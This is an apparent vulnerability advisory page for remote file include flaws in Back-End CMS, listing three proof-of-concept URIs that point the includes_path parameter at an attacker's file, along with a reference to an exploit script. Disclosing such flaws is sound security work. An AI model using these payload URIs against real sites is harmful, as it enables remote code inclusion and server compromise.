Back-End CMS Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

Back-End CMS Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[Path]/admin/index.php?includes_path=attacker's_file
http://www.example.com/[Path]/Facts.php?includes_path=attacker's_file
http://www.example.com/[Path]/search.php?includes_path=attacker's_file

/data/vulnerabilities/exploits/20207.pl